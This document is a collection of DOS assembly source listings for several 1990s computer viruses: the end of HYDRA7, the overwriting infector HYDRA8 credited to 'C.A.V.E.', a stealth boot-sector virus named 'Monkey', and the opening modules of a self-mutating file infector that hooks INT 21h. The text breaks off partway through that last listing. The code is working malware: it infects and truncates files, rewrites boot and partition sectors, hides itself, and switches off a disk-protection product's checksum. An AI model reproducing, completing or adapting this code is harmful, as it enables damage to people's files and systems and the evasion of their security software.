  1836.         int    21h            ; DOS Services  ah=function 1Ah
  1837.                         ;  set DTA(disk xfer area) ds:dx
  1838.         jmp    short loc_8
  1839.         nop
  1840. loc_6:
  1841.         mov    ah,1Ah
  1842.         mov    dx,offset data_10
  1843.         int    21h            ; DOS Services  ah=function 1Ah
  1844.                         ;  set DTA(disk xfer area) ds:dx
  1845.         push    dx
  1846.         mov    dx,offset data_12
  1847.         mov    ah,4Eh            ; 'N'
  1848.         xor    cx,cx            ; Zero register
  1849.         int    21h            ; DOS Services  ah=function 4Eh
  1850.                         ;  find 1st filenam match @ds:dx
  1851.         jc    loc_5            ; Jump if carry Set
  1852. loc_7:
  1853.         mov    ah,3Ch            ; '<'
  1854.         xor    cx,cx            ; Zero register
  1855.         mov    dx,offset data_11
  1856.         int    21h            ; DOS Services  ah=function 3Ch
  1857.                         ;  create/truncate file @ ds:dx
  1858.         mov    bx,ax
  1859.         jc    loc_5            ; Jump if carry Set
  1860.         mov    ah,3Eh            ; '>'
  1861.         int    21h            ; DOS Services  ah=function 3Eh
  1862.                         ;  close file, bx=file handle
  1863.         jc    loc_5            ; Jump if carry Set
  1864.         mov    ah,4Fh            ; 'O'
  1865.         int    21h            ; DOS Services  ah=function 4Fh
  1866.                         ;  find next filename match
  1867.         jnc    loc_7            ; Jump if carry=0
  1868. loc_8:
  1869.         xor    di,di            ; Zero register
  1870.         mov    si,24Eh
  1871.         mov    cx,22h
  1872.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1873.         pop    bx
  1874.         mov    cs:data_7,0
  1875.         mov    word ptr cs:data_7+2,es
  1876.         pop    bx
  1877.         jmp    dword ptr cs:data_7
  1878.         push    ds
  1879.         pop    es
  1880.         mov    cx,0FFFFh
  1881.         mov    si,270h
  1882.         mov    di,100h
  1883.         sub    cx,si
  1884.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1885.         mov    word ptr cs:[100h],100h
  1886.         mov    word ptr cs:[102h],ds
  1887.         mov    ax,bx
  1888.         jmp    dword ptr cs:[100h]
  1889.         int    20h            ; DOS program terminate
  1890.  
  1891. hydra7        endp
  1892.  
  1893. seg_a        ends
  1894.  
  1895.  
  1896.  
  1897.         end    start
  1898.  
  1899. done
  1900.  
  1901. ;██████████████████████████████████████████████████████████████████████████
  1902. ;██                                         ██
  1903. ;██                    HYDRA8                         ██
  1904. ;██                                         ██
  1905. ;██      Created:   28-Aug-91                             ██
  1906. ;██      Passes:    5           Analysis Options on: W                 ██
  1907. ;██      Copyright (c)                                 ██
  1908. ;██                                         ██
  1909. ;██████████████████████████████████████████████████████████████████████████
  1910.  
  1911. psp_cmd_size    equ    80h
  1912. data_17e    equ    1EFh
  1913. data_18e    equ    1F2h
  1914. data_19e    equ    9D9Ah
  1915.  
  1916. seg_a        segment    byte public
  1917.         assume    cs:seg_a, ds:seg_a
  1918.  
  1919.  
  1920.         org    100h
  1921.  
  1922. hydra8        proc    far
  1923.  
  1924. start:
  1925.         jmp    loc_3
  1926.         db     59h, 44h, 00h, 00h
  1927. data_3        db    'HyDra-8   Beta - Not For Release'
  1928.         db    '. *.CO?'
  1929.         db    0
  1930. data_6        dw    0, 8B39h
  1931. data_8        dw    0
  1932. data_9        db    0
  1933.         db    18 dup (0)
  1934. data_10        db    0
  1935.         db    10 dup (0)
  1936. data_11        db    0
  1937.         db    0, 0, 0, 0, 0, 0
  1938. data_12        db    0
  1939.         db    0, 0, 0, 0, 0, 0
  1940. copyright    db    'Copyright (c)'
  1941.         db    '  1991 by C.A.V.E.  '
  1942. data_13        db    2Ah
  1943.         db     2Eh, 45h, 58h, 45h, 00h
  1944. data_14        db    33h
  1945.         db    0C9h, 1Eh, 52h,0E8h, 06h, 00h
  1946.         db    0E8h, 13h, 00h,0EBh, 36h, 90h
  1947.         db    0BEh, 48h, 01h
  1948.         db    0BFh, 5Ah, 01h,0B9h, 12h, 00h
  1949.  
  1950. locloop_1:
  1951.         xor    byte ptr [si],0F5h
  1952.         movsb                ; Mov [si] to es:[di]
  1953.         loop    locloop_1        ; Loop if cx > 0
  1954.  
  1955.         retn
  1956.         db    0B8h, 00h, 0Fh,0CDh, 10h,0B4h
  1957.         db     00h,0CDh, 10h,0B8h, 00h, 02h
  1958.         db    0B6h, 0Ch,0B2h, 1Fh,0CDh, 10h
  1959.         db     33h,0D2h
  1960.         db    0BAh, 5Ah, 01h,0B4h, 09h,0CDh
  1961.         db     21h,0B8h, 00h, 02h,0B6h, 18h
  1962.         db    0B2h, 00h,0CDh, 10h,0C3h
  1963.         db    0B8h, 00h, 4Ch,0CDh, 21h, 00h
  1964.         db    0A2h, 9Dh, 9Ah,0F5h, 9Ch, 86h
  1965.         db    0F5h
  1966.         db    0BFh, 9Ah, 9Dh, 9Bh,0F5h,0B2h
  1967.         db     94h, 99h, 81h,0CAh,0D1h
  1968. loc_3:
  1969.         push    ax
  1970.         mov    ax,cs
  1971.         add    ax,1000h
  1972.         xor    di,di            ; Zero register
  1973.         mov    cx,1EFh
  1974.         mov    si,100h
  1975.         mov    es,ax
  1976.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1977.         mov    ah,1Ah
  1978.         mov    dx,offset data_9
  1979.         int    21h            ; DOS Services  ah=function 1Ah
  1980.                         ;  set DTA(disk xfer area) ds:dx
  1981.         mov    ah,4Eh            ; 'N'
  1982.         mov    dx,offset data_3+22h    ; ('*')
  1983.         int    21h            ; DOS Services  ah=function 4Eh
  1984.                         ;  find 1st filenam match @ds:dx
  1985.         jc    loc_7            ; Jump if carry Set
  1986. loc_4:
  1987.         mov    ah,3Dh            ; '='
  1988.         mov    al,2
  1989.         mov    dx,offset data_11
  1990.         int    21h            ; DOS Services  ah=function 3Dh
  1991.                         ;  open file, al=mode,name@ds:dx
  1992.         mov    bx,ax
  1993.         push    es
  1994.         pop    ds
  1995.         mov    ax,3F00h
  1996.         mov    cx,0FFFFh
  1997.         mov    dx,data_17e
  1998.         int    21h            ; DOS Services  ah=function 3Fh
  1999.                         ;  read file, bx=file handle
  2000.                         ;   cx=bytes to ds:dx buffer
  2001.         add    ax,1EFh
  2002.         mov    cs:data_8,ax
  2003.         cmp    word ptr ds:data_18e,4459h
  2004.         jne    loc_5            ; Jump if not equal
  2005.         mov    ah,3Eh            ; '>'
  2006.         int    21h            ; DOS Services  ah=function 3Eh
  2007.                         ;  close file, bx=file handle
  2008.         push    cs
  2009.         pop    ds
  2010.         mov    ah,4Fh            ; 'O'
  2011.         int    21h            ; DOS Services  ah=function 4Fh
  2012.                         ;  find next filename match
  2013.         jc    loc_8            ; Jump if carry Set
  2014.         jmp    short loc_4
  2015. loc_5:
  2016.         xor    cx,cx            ; Zero register
  2017.         mov    dx,cx
  2018.         mov    ax,4200h
  2019.         int    21h            ; DOS Services  ah=function 42h
  2020.                         ;  move file ptr, bx=file handle
  2021.                         ;   al=method, cx,dx=offset
  2022.         jc    loc_6            ; Jump if carry Set
  2023.         mov    ah,40h            ; '@'
  2024.         xor    dx,dx            ; Zero register
  2025.         mov    cx,cs:data_8
  2026.         int    21h            ; DOS Services  ah=function 40h
  2027.                         ;  write file  bx=file handle
  2028.                         ;   cx=bytes from ds:dx buffer
  2029. loc_6:
  2030.         mov    ah,3Eh            ; '>'
  2031.         int    21h            ; DOS Services  ah=function 3Eh
  2032.                         ;  close file, bx=file handle
  2033.         push    cs
  2034.         pop    ds
  2035. loc_7:
  2036.         mov    ah,1Ah
  2037.         mov    dx,psp_cmd_size
  2038.         int    21h            ; DOS Services  ah=function 1Ah
  2039.                         ;  set DTA(disk xfer area) ds:dx
  2040.         jmp    short loc_11
  2041.         db    90h
  2042. loc_8:
  2043.         clc                ; Clear carry flag
  2044.         xor    cx,cx            ; Zero register
  2045.         push    ds
  2046.         push    dx
  2047.         mov    ah,1Ah
  2048.         mov    dx,offset data_9
  2049.         int    21h            ; DOS Services  ah=function 1Ah
  2050.                         ;  set DTA(disk xfer area) ds:dx
  2051.         mov    dx,offset data_13
  2052.         mov    ah,4Eh            ; 'N'
  2053.         xor    cx,cx            ; Zero register
  2054.         int    21h            ; DOS Services  ah=function 4Eh
  2055.                         ;  find 1st filenam match @ds:dx
  2056.         jc    loc_7            ; Jump if carry Set
  2057. loc_9:
  2058.         mov    ah,3Ch            ; '<'
  2059.         xor    cx,cx            ; Zero register
  2060.         mov    dx,offset data_11
  2061.         int    21h            ; DOS Services  ah=function 3Ch
  2062.                         ;  create/truncate file @ ds:dx
  2063.         mov    bx,ax
  2064.         jc    loc_7            ; Jump if carry Set
  2065.         mov    ax,3D02h
  2066.         mov    dx,offset data_11
  2067.         int    21h            ; DOS Services  ah=function 3Dh
  2068.                         ;  open file, al=mode,name@ds:dx
  2069.         mov    bx,ax
  2070.         clc                ; Clear carry flag
  2071.         xor    dx,dx            ; Zero register
  2072.         mov    ah,40h            ; '@'
  2073.         mov    dx,offset data_14
  2074.         mov    cx,5Ah
  2075.         int    21h            ; DOS Services  ah=function 40h
  2076.                         ;  write file  bx=file handle
  2077.                         ;   cx=bytes from ds:dx buffer
  2078.         cmp    ax,5Ah
  2079.         jb    loc_10            ; Jump if below
  2080.         mov    ah,3Eh            ; '>'
  2081.         int    21h            ; DOS Services  ah=function 3Eh
  2082.                         ;  close file, bx=file handle
  2083.         jc    loc_10            ; Jump if carry Set
  2084.         mov    ah,4Fh            ; 'O'
  2085.         int    21h            ; DOS Services  ah=function 4Fh
  2086.                         ;  find next filename match
  2087.         jnc    loc_9            ; Jump if carry=0
  2088. loc_10:
  2089.         mov    ax,4C00h
  2090.         int    21h            ; DOS Services  ah=function 4Ch
  2091.                         ;  terminate with al=return code
  2092. loc_11:
  2093.         xor    di,di            ; Zero register
  2094.         mov    si,offset data_15
  2095.         mov    cx,22h
  2096.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  2097.         pop    bx
  2098.         mov    cs:data_6,0
  2099.         mov    word ptr cs:data_6+2,es
  2100.         pop    bx
  2101.         jmp    dword ptr cs:data_6
  2102. data_15        db    1Eh
  2103.         db     07h,0B9h,0FFh,0FFh,0BEh,0EFh
  2104.         db     02h,0BFh, 00h, 01h, 2Bh,0CEh
  2105.         db    0F3h,0A4h, 2Eh,0C7h, 06h, 00h
  2106.         db     01h, 00h, 01h, 2Eh, 8Ch, 1Eh
  2107.         db     02h, 01h, 8Bh,0C3h, 2Eh,0FFh
  2108.         db     2Eh, 00h, 01h,0CDh
  2109.         db    20h
  2110.  
  2111. hydra8        endp
  2112.  
  2113. seg_a        ends
  2114.  
  2115.  
  2116.  
  2117.         end    start
  2118.  
  2119. done
  2120.  
  2121. Code   Segment
  2122.        Assume  CS:Code,DS:CODE,ES:CODE
  2123.        ORG     00H
  2124.  
  2125. MAIN:
  2126.        JMP     INITIAL
  2127.  
  2128. ; space above 1fh is for floppy format data
  2129.  
  2130.        ORG     1FH
  2131. INT_13     EQU     THIS BYTE
  2132.  
  2133.           PUSH    DS
  2134.           PUSH    SI
  2135.           PUSH    DI
  2136.           PUSH    AX
  2137.           PUSH    CX
  2138.           PUSH    DX
  2139.  
  2140.           CALL    SET_HEAD
  2141.  
  2142.           CMP     AH,02H
  2143.           JNZ     END_ACTION
  2144.  
  2145.           PUSH    DX
  2146.           SUB     AX,AX
  2147.           INT     1AH
  2148.  
  2149. TIME      EQU $ + 2
  2150.           CMP     DL,40H
  2151.           POP     DX
  2152.           JNB     END_ACTION
  2153.  
  2154.           CALL HANDLE_DISK
  2155.  
  2156. END_ACTION:
  2157.           POP   DX
  2158.           POP   CX
  2159.           POP   AX
  2160.           POP   DI
  2161.  
  2162.           PUSH  DX
  2163.           PUSH  CX
  2164.           PUSH  AX
  2165.  
  2166.           CMP   CX,03H                 ; YES, IS SECTOR LESS THAN 3?
  2167.           JNB   EXIT_2                 ; NO, EXIT
  2168.  
  2169.           CMP   DH,BYTE PTR DS:[SI]    ; Right head?
  2170.           JNZ   EXIT_2                 ; NO, EXIT
  2171.  
  2172.           CMP   AH,02H                 ; READ ?
  2173.           JZ    STEALTH                ; YES, STEALTH
  2174.  
  2175.           CMP   AH,03H                 ; WRITE ?
  2176.           JNZ   EXIT_2                 ; NO, EXIT
  2177.                                        ; YES!
  2178.           CMP   DL,80H                 ; HARD DRIVE?
  2179.           JB    EXIT_2                 ; NO, EXIT
  2180.  
  2181.           SUB   AH,AH            ; else RESET DISK - make HD light blink
  2182.           JMP   SHORT EXIT_2           ; EXIT
  2183. STEALTH:
  2184.           CALL  INT13                  ; READ
  2185.           JB    EXIT_3                 ; ERROR?
  2186.  
  2187.           CALL  COMP_SIG               ; MY RELATIVE?
  2188.           JZ    REDIRECT               ; YES, REDIRECT
  2189.  
  2190.           CALL  COMP_PA                ; NO, IS IT PA?
  2191.           JZ    REDIRECT               ; YES, REDIRECT
  2192.  
  2193. EXIT_0:
  2194.           CLC                          ; NO, RESET FLAG
  2195.           JMP   SHORT EXIT_3           ; EXIT
  2196.  
  2197. REDIRECT:
  2198.  
  2199.           CALL  CHSEC        ; CALC. THE SECTOR TO HIDE & PUT IN CL
  2200.  
  2201.           MOV   DH,BYTE PTR DS:[SI+1]  ; SET RIGHT HEAD
  2202.  
  2203.           POP   AX                     ; RESTORE AX
  2204.           CALL  INT13                  ; RE-READ
  2205.           CALL  ENCRPT_PBR
  2206.           POP   CX                     ; RESTORE CX, DX
  2207.           POP   DX
  2208.           JMP   SHORT EXIT_4           ; EXIT
  2209. EXIT_2:
  2210.           CALL  INT13
  2211. EXIT_3:
  2212.           POP   DS
  2213.           POP   DS
  2214.           POP   DS
  2215. EXIT_4:
  2216.           POP   SI
  2217.           POP   DS
  2218.           RETF  0002H
  2219.  
  2220. READ_SEC_1:
  2221.           MOV   AX,0201H         ; READ
  2222. INT13 PROC NEAR
  2223.           PUSHF
  2224.           CALL  DWORD PTR CS:INT13_ADDR     ;***********
  2225.           RET
  2226. INT13 ENDP
  2227.  
  2228. HOOK_ENTRY   EQU  THIS BYTE
  2229. HOOK:
  2230.           INT   12H
  2231.           MOV   SI,004CH
  2232.           PUSH  SI
  2233.           CMP   BYTE PTR CS:HOME_SEC,02H       ; I am in sector 2?
  2234.           JZ    SETUP_SPECIAL
  2235.  
  2236. SETUP_NORMAL:
  2237.  
  2238.           CALL  SHIFT_NORMAL
  2239.  
  2240.           MOV   DI,OFFSET INT13_ADDR
  2241.           MOV   CX,0002H
  2242.           CLD
  2243.           REPZ  MOVSW
  2244.  
  2245.           JMP   SHORT STORE_SEGMENT
  2246.  
  2247. SETUP_SPECIAL:
  2248.  
  2249.           CALL  SHIFT_SPECIAL
  2250.  
  2251. STORE_SEGMENT:
  2252.           POP   SI
  2253.           MOV   WORD PTR DS:[SI],OFFSET INT_13  ; STORE MY ENTRY POINT
  2254.           MOV   DS:[SI+2],AX            ; STORE MY SEGMENT
  2255.  
  2256. PATCH_OVER:
  2257.  
  2258.           PUSH  CS
  2259.           POP   DS
  2260.           CALL  PATCH           ; PATCH OVER
  2261.           PUSH  ES              ; PUSH SEGMENT
  2262.           MOV   AX,OFFSET JMP_ADDR
  2263.           PUSH  AX              ; PUSH ADDRESS
  2264.           STI
  2265.           RETF                 ; FAR JMP
  2266.  
  2267.     JMP_ADDR   EQU THIS BYTE
  2268. BOOT:
  2269.           MOV   ES,CX
  2270.           MOV   BX,SP            ; TO 0000:7C00
  2271.           PUSH  CX              ; SAVE JMP SEGMENT
  2272.           PUSH  BX
  2273.  
  2274.           MOV   DX,0080H         ; HANDLE C:
  2275.           CALL  SET_HEAD
  2276.           CALL  HANDLE_DISK
  2277.  
  2278. BOOT_SEC  EQU $ + 1
  2279.           MOV   CL,05H           ; FROM SECTOR 3   ????
  2280.  
  2281. BOOT_DISK  EQU $ + 1
  2282.           MOV   DX,0100H         ; C:, HEAD 0      ????
  2283.  
  2284.           CALL  READ_SEC_1      ; INT 13
  2285.  
  2286.           CALL  ENCRPT_PBR
  2287.  
  2288.           RETF
  2289.  
  2290. HANDLE_DISK PROC NEAR
  2291.  
  2292.           ; *** READ SECTOR 1 ***
  2293.           SUB   CX,CX
  2294.           INC   CX
  2295.           PUSH  CX
  2296.  
  2297.           MOV   DH,[SI]          ; HEAD
  2298.           CALL  READ_SEC_1      ; INT 13
  2299.           JB    END_HANDLE_DISK          ; ERROR -> END
  2300.  
  2301.           ; *** COMPARE ***
  2302.           CALL  COMP_SIG
  2303.           JZ    E_2                      ; SAME -> UPDATE MYSELF
  2304.  
  2305.           ; *** PA?  ***
  2306.           CALL  COMP_PA                  ; Is it Pagett's disksec?
  2307.           JNZ   UPDATE_DISK              ; NO
  2308.  
  2309.           ; *** OK?  ***
  2310.           INC   CX
  2311.           CMP   WORD PTR ES:[BX+1FAH],00H ; when this byte in disksec is set
  2312.                                           ; to 0 means disksec would not do
  2313.                                           ; checksum of partitions - Pagett
  2314.                                           ; sucks
  2315.           JZ    E_2                       ; SAME -> UPDATE MYSELF
  2316.  
  2317.           MOV   WORD PTR ES:[BX+1FAH],00H ; set this to zero
  2318.           MOV   CL,1H                     ; write the change back to sector 1
  2319.           CALL  WRITE_SEC_1               ;
  2320.           JB    END_HANDLE_DISK
  2321.  
  2322.           ; *** YES! READ SECTOR 2  ***
  2323.           INC   CX              ; yes,Pagette 's disksecure is on sector 1
  2324.           MOV   DH,[SI+2]       ; My relative is on sector 2 - read sector 2
  2325.           CALL  READ_SEC_1      ; INT 13
  2326.           JB    END_HANDLE_DISK ; ERROR -> END
  2327.           POP   AX
  2328.           PUSH  CX
  2329.  
  2330. UPDATE_DISK:
  2331.           CALL  CHSEC        ; CALC. THE SECTOR TO HIDE & PUT IN CL
  2332.           CALL  ENCRPT_PBR
  2333.           INC   SI
  2334.           CALL  WRITE_SEC_1
  2335.           DEC   SI
  2336.           JB    END_HANDLE_DISK
  2337.  
  2338.           CALL  ENCRPT_PBR
  2339.           PUSH  CX
  2340.           CALL  PATCH
  2341.           POP   CX
  2342.  
  2343.           PUSH  DX
  2344.           CMP   DL,80H
  2345.           JNB   E_1
  2346.           XOR   DL,DL
  2347. E_1:
  2348.           MOV   WORD PTR ES:[BX+BOOT_DISK],DX
  2349.           POP   DX
  2350.           MOV   BYTE PTR ES:[BX+BOOT_SEC],CL
  2351.           POP   CX
  2352.           PUSH  CX
  2353.           MOV   BYTE PTR ES:[BX+OFFSET HOME_SEC],CL
  2354.           MOV   WORD PTR ES:[BX+OFFSET BOOT_SIG],0AA55H
  2355.  
  2356. E_2:
  2357.           CALL  WRITE_SEC_1
  2358.  
  2359. END_HANDLE_DISK:
  2360.           POP   AX
  2361.           RET
  2362.  
  2363. HANDLE_DISK ENDP
  2364.  
  2365. WRITE_SEC_1 PROC NEAR
  2366.           MOV  DH,[SI]
  2367. WRITE_SEC_2:
  2368.           MOV  AX,0301H
  2369.           CALL INT13
  2370.           RET
  2371. WRITE_SEC_1 ENDP
  2372.  
  2373. COMP_SIG PROC NEAR
  2374.    CMP     ES:[BX+OFFSET PROG_SIG],9219H
  2375.    RET
  2376. COMP_SIG   ENDP
  2377.  
  2378. COMP_PA PROC NEAR
  2379.    CMP   WORD PTR ES:[BX+119H],6150H   ; PA?
  2380.    RET
  2381. COMP_PA    ENDP
  2382.  
  2383. HOME_SEC    DB     01H
  2384.  
  2385. FLOPPY_HEAD DB     00H,01H,01H
  2386. HARD_HEAD   DB     00H,00H,00H
  2387.  
  2388.                   ;  360 720 1.2 1.44
  2389. FLOP_SECT_TABLE   DB  02H,05H,09H,0BH
  2390. SAVE_SECT_TABLE   DB  03H,05H,0EH,0EH
  2391.  
  2392. CHSEC PROC NEAR
  2393.    PUSH    DI
  2394.    PUSH    SI
  2395.    MOV     AL,ES:[BX+14H]
  2396.    MOV     CX,0004H
  2397. CHSEC_1:
  2398.    MOV     SI,CX
  2399.    DEC     SI
  2400.    CMP     FLOP_SECT_TABLE[SI],AL
  2401.    JZ      CHSEC_END_1
  2402.    LOOP    CHSEC_1
  2403.    MOV     CL,03H
  2404.    JMP     SHORT CHSEC_END_2
  2405. CHSEC_END_1:
  2406.    MOV     CL,SAVE_SECT_TABLE[SI]
  2407. CHSEC_END_2:
  2408.    POP     SI
  2409.    POP     DI
  2410.    RET
  2411. CHSEC      ENDP
  2412.  
  2413. SHIFT_NORMAL PROC NEAR
  2414.  ; FIND THE SEGMENT TO HIDE
  2415.     DEC    AX
  2416.     MOV    DS:[413H],AX
  2417.  
  2418. SHIFT_SPECIAL:
  2419.     MOV    CL,06H
  2420.     SHL    AX,CL
  2421.     ADD    AL,20H
  2422.     MOV    ES,AX
  2423.     RET
  2424. SHIFT_NORMAL     ENDP
  2425.  
  2426. PATCH PROC NEAR         ; PATCH ON BOOT SECTOR STARTING AT BYTE int_13
  2427.     PUSH  SI
  2428.     MOV   DI,BX
  2429.     MOV   SI,OFFSET INT_13
  2430.     ADD   DI,SI
  2431. ;   CLD
  2432.     MOV   CX,OFFSET PROG_END - OFFSET INT_13
  2433.     REPZ  MOVSB
  2434.  
  2435. PATCH_JMP:
  2436.     MOV   DI,BX
  2437.  
  2438.     SUB   SI,SI
  2439.     MOV   CL,3H
  2440.     REPZ  MOVSB
  2441.  
  2442.     POP   SI
  2443.     RET
  2444. PATCH     ENDP
  2445.  
  2446. SET_HEAD PROC NEAR
  2447.     PUSH  CS
  2448.     POP   DS
  2449.  
  2450.     MOV   SI,OFFSET FLOPPY_HEAD
  2451.     CMP   DL,80H
  2452.     JB    SET_HEAD_EXIT
  2453.     MOV   SI,OFFSET HARD_HEAD
  2454. SET_HEAD_EXIT:
  2455.     RET
  2456. SET_HEAD  ENDP
  2457.  
  2458. INITIAL:
  2459.       CLI
  2460.       SUB   BX,BX
  2461.       MOV   DS,BX
  2462.       MOV   SS,BX
  2463.       MOV   SP,7C00H
  2464.       JMP   HOOK
  2465.       NOP
  2466.       NOP
  2467.  
  2468. ENCRPT_PBR:
  2469.       PUSH    DI
  2470.       PUSH    CX
  2471.       PUSH    AX
  2472.  
  2473.       MOV     DI,BX
  2474.       MOV     CX,200H
  2475.  
  2476.       CLD
  2477. ENCRPT_1:
  2478.       MOV     AL,ES:[DI]
  2479. ENCRPT_CODE   EQU $ + 0001H
  2480.       XOR     AL,2EH
  2481.       STOSB
  2482.       LOOP    ENCRPT_1
  2483.  
  2484.       POP     AX
  2485.       POP     CX
  2486.       POP     DI
  2487.       RET
  2488.  
  2489.  
  2490.              ORG 01F4H
  2491. ;PROG_NAME   DB     "Monkey"
  2492. PROG_NAME   DB     6dh,8fh,8eh,8bh,85h,99h
  2493.  
  2494.              ORG 01FAH
  2495. PROG_SIG    DB     19H,92H
  2496.  
  2497. PROG_END    EQU   THIS BYTE
  2498.  
  2499.             ORG 01FCH
  2500. INT13_ADDR  DB     00H,00H
  2501.  
  2502.             ORG 01FEH
  2503. BOOT_SIG    DB     55H,0AAH
  2504. PROG_TAIL   EQU   THIS BYTE
  2505.  
  2506. PROG_LEN    EQU   OFFSET PROG_END - OFFSET INT_13
  2507.  
  2508.  
  2509. CODE      ENDS
  2510.       END MAIN
  2511.  
  2512.  
  2513. done
  2514.  
  2515.  
  2516.  
  2517. code          segment
  2518.           assume cs:code,ds:code
  2519.           .radix 16
  2520.           org  100
  2521. start:
  2522.           push word ptr cs:[table+2]
  2523.           push cs
  2524.           pop  ds
  2525.           jmp  word ptr cs:[table]      ;go to module 1
  2526.  
  2527. curofs          dw   ?
  2528. files          db   0               ;number of infected files from this copy
  2529. fsize          dw   2               ;size of infected file
  2530. ftime          dw     ?
  2531. fdate          dw     ?
  2532. stdint21      dd     ?
  2533. oldint13      dd     ?
  2534. oldint21      dd     ?
  2535. oldint24      dd     ?
  2536.  
  2537. ;------------- TABLE WITH MODULE PARAMETERS --------------------
  2538. table:
  2539.           dw   offset false_mod_1 ;00
  2540.           dw   offset mod_2       ;02
  2541.           dw   offset mod_3       ;04
  2542.           dw   offset mod_4       ;06           ;offset modules
  2543.           dw   offset mod_5       ;08
  2544.           dw   offset mod_6       ;0a
  2545.           dw   offset mod_7       ;0c
  2546.           dw   offset mod_8       ;0e
  2547.  
  2548.           dw   offset mod_2 - offset mod_1;10
  2549.           dw   offset mod_3 - offset mod_2;12
  2550.           dw   offset mod_4 - offset mod_3;14
  2551.           dw   offset mod_5 - offset mod_4;16
  2552.           dw   offset mod_6 - offset mod_5;18    ;size modules
  2553.           dw   offset mod_7 - offset mod_6;1a
  2554.           dw   offset mod_8 - offset mod_7;1c
  2555.           dw   offset myend - offset mod_8;1e
  2556.  
  2557.  
  2558. ;------------- MODULE - 1 - CODER/DECODER ----------------------
  2559. mod_1:
  2560.           mov  bx,offset table+2   ;first module to working (module 2)
  2561.           mov  cx,6            ;number of modules to working
  2562. mod_1_lp1:
  2563.           cmp  bx,offset table+0a
  2564.           jne  mod_1_cont
  2565.           add  bx,2
  2566. mod_1_cont:
  2567.           push bx
  2568.           push cx
  2569.           mov  ax,[bx]           ;ax - offset module
  2570.           mov  cx,[bx+10]           ;cx - size of module
  2571.           mov  bx,ax
  2572. mod_1_lp2:
  2573.           xor  byte ptr [bx],al
  2574.           inc  bx
  2575.           loop mod_1_lp2
  2576.           pop  cx
  2577.           pop  bx
  2578.           add  bx,2
  2579.           loop mod_1_lp1
  2580.           ret
  2581.  
  2582. ;------------- MODULE - 2 - MUTATION TO MEMORY -----------------
  2583. mod_2:
  2584.              ;instalation check
  2585.  
  2586.           mov    es,cs:[2]                   ;memory size
  2587.           mov    di,100
  2588.           mov    si,100
  2589.           mov    cx,0bh
  2590.           repe   cmpsb
  2591.           jne    mod_2_install               ;jump if not install
  2592.           jmp    word ptr cs:[table+06]  ;if install, jump to module 4
  2593.  
  2594. mod_2_install:
  2595.              ;instalation
  2596.  
  2597.           mov    ax,cs
  2598.           dec    ax
  2599.           mov    ds,ax
  2600.  
  2601.           cmp    byte ptr ds:[0],'Z'
  2602.           je     mod_2_cont
  2603.  
  2604.           jmp    word ptr cs:[table+6]        ;if no last MCB - go to mod4
  2605.  
  2606. mod_2_cont:
  2607.           sub    word ptr ds:[3],0c0
  2608.           mov    ax,es
  2609.           sub    ax,0c0
  2610.           mov    es,ax
  2611.           mov    word ptr ds:[12],ax       ;decrement memory size with 2K
  2612.           push   cs
  2613.           pop    ds
  2614.  
  2615. mod_2_mut:
  2616.           mov  byte ptr cs:files,0
  2617.  
  2618.           mov  di,100
  2619.           mov  cx,offset mod_1-100
  2620.           mov  si,100
  2621.           rep  movsb     ;write table to new memory
  2622.  
  2623.           mov  bx,word ptr cs:[table]
  2624.           add  bx,offset mod_1_lp2-offset mod_1+1
  2625.           xor  byte ptr [bx],18               ;change code method
  2626.  
  2627.           mov  cx,8
  2628.           mov  word ptr curofs,offset mod_1
  2629. mod_2_lp1:
  2630.           push cx
  2631.           call mod_2_rnd ;generate random module addres
  2632.           push bx         ;addres in table returned from mod_2_rnd
  2633.           mov  ax,[bx]   ;offset module
  2634.           push ax
  2635.           add  bx,10
  2636.           mov  cx,[bx]   ;length of module
  2637.           pop  si
  2638.           pop  bx
  2639.           xchg di,curofs
  2640.           mov  word ptr es:[bx],di ;change module offset in table
  2641.           rep  movsb           ;copy module to new memory
  2642.           xchg di,curofs           ;change current offset in new memory
  2643.           mov  ax,8000
  2644.           or   word ptr [bx],ax    ;mark module - used
  2645.           pop  cx
  2646.           loop mod_2_lp1
  2647.           mov  cl,8
  2648.           not  ax
  2649.           mov  bx,offset table
  2650. mod_2_lp2:
  2651.           and  word ptr [bx],ax    ;unmark all modules
  2652.           add  bx,2
  2653.           loop mod_2_lp2
  2654.  
  2655.           jmp  word ptr cs:[table+4]  ;go to module 3
  2656.  
  2657. mod_2_rnd:
  2658.           push cx
  2659.           push es
  2660.           xor  cx,cx
  2661.           mov  es,cx
  2662. mod_2_lp3:
  2663.           mov  bx,es:[46c]
  2664.           db 81,0e3,07,00  ;and bx,7
  2665.           shl  bx,1
  2666.           add  bx,offset table
  2667.           test [bx],8000
  2668.           jnz  mod_2_lp3
  2669.           pop  es
  2670.           pop  cx
  2671.           ret
  2672.  
  2673. ;------------- MODULE - 3 - SET INTERRUPT VECTORS ---------------
  2674. mod_3:
  2675.           xor    ax,ax
  2676.           mov    ds,ax
  2677.  
  2678.           mov    ax,ds:[4*21]
  2679.           mov    word ptr es:[oldint21],ax
  2680.           mov    ax,ds:[4*21+2]
  2681.           mov    word ptr es:[oldint21+2],ax
  2682.  
  2683.           mov    ah,30
  2684.           int    21
  2685.           cmp    ax,1e03
  2686.           jne    mod_3_getvec
  2687.  
  2688.           mov    word ptr es:[stdint21],1460
  2689.           mov    ax,1203
  2690.           push   ds
  2691.           int    2f
  2692.           mov    word ptr es:[stdint21+2],ds
  2693.           pop    ds
  2694.           jmp    mod_3_setvec
  2695.  
  2696. mod_3_getvec:
  2697.           mov    ax,ds:[4*21]
  2698.           mov    word ptr es:[stdint21],ax
  2699.           mov    ax,ds:[4*21+2]
  2700.           mov    word ptr es:[stdint21+2],ax
  2701.  
  2702. mod_3_setvec:
  2703.           cli
  2704.           mov    ax,word ptr es:[table+0c]
  2705.           mov    ds:[4*21],ax
  2706.           mov    ax,es
  2707.           mov    ds:[4*21+2],ax
  2708.           sti
  2709.  
  2710.           mov    cx,es
  2711.           mov    ah,13             ;
  2712.           int    2f              ;
  2713.           push   es              ;
  2714.           mov    es,cx             ;
  2715.           mov    word ptr es:[oldint13],dx     ; get standart int13 addres
  2716.           mov    word ptr es:[oldint13+2],ds ;
  2717.           pop    es              ;
  2718.           int    2f              ;
  2719.  
  2720.           jmp    word ptr cs:[table+06]              ;go to module 4
  2721.  
  2722. ;------------- MODULE - 4 - RESTORE OLD PROGRAM CODE & START ----
  2723. mod_4:
  2724.           push   cs
  2725.           push   cs
  2726.           pop    ds
  2727.           pop    es
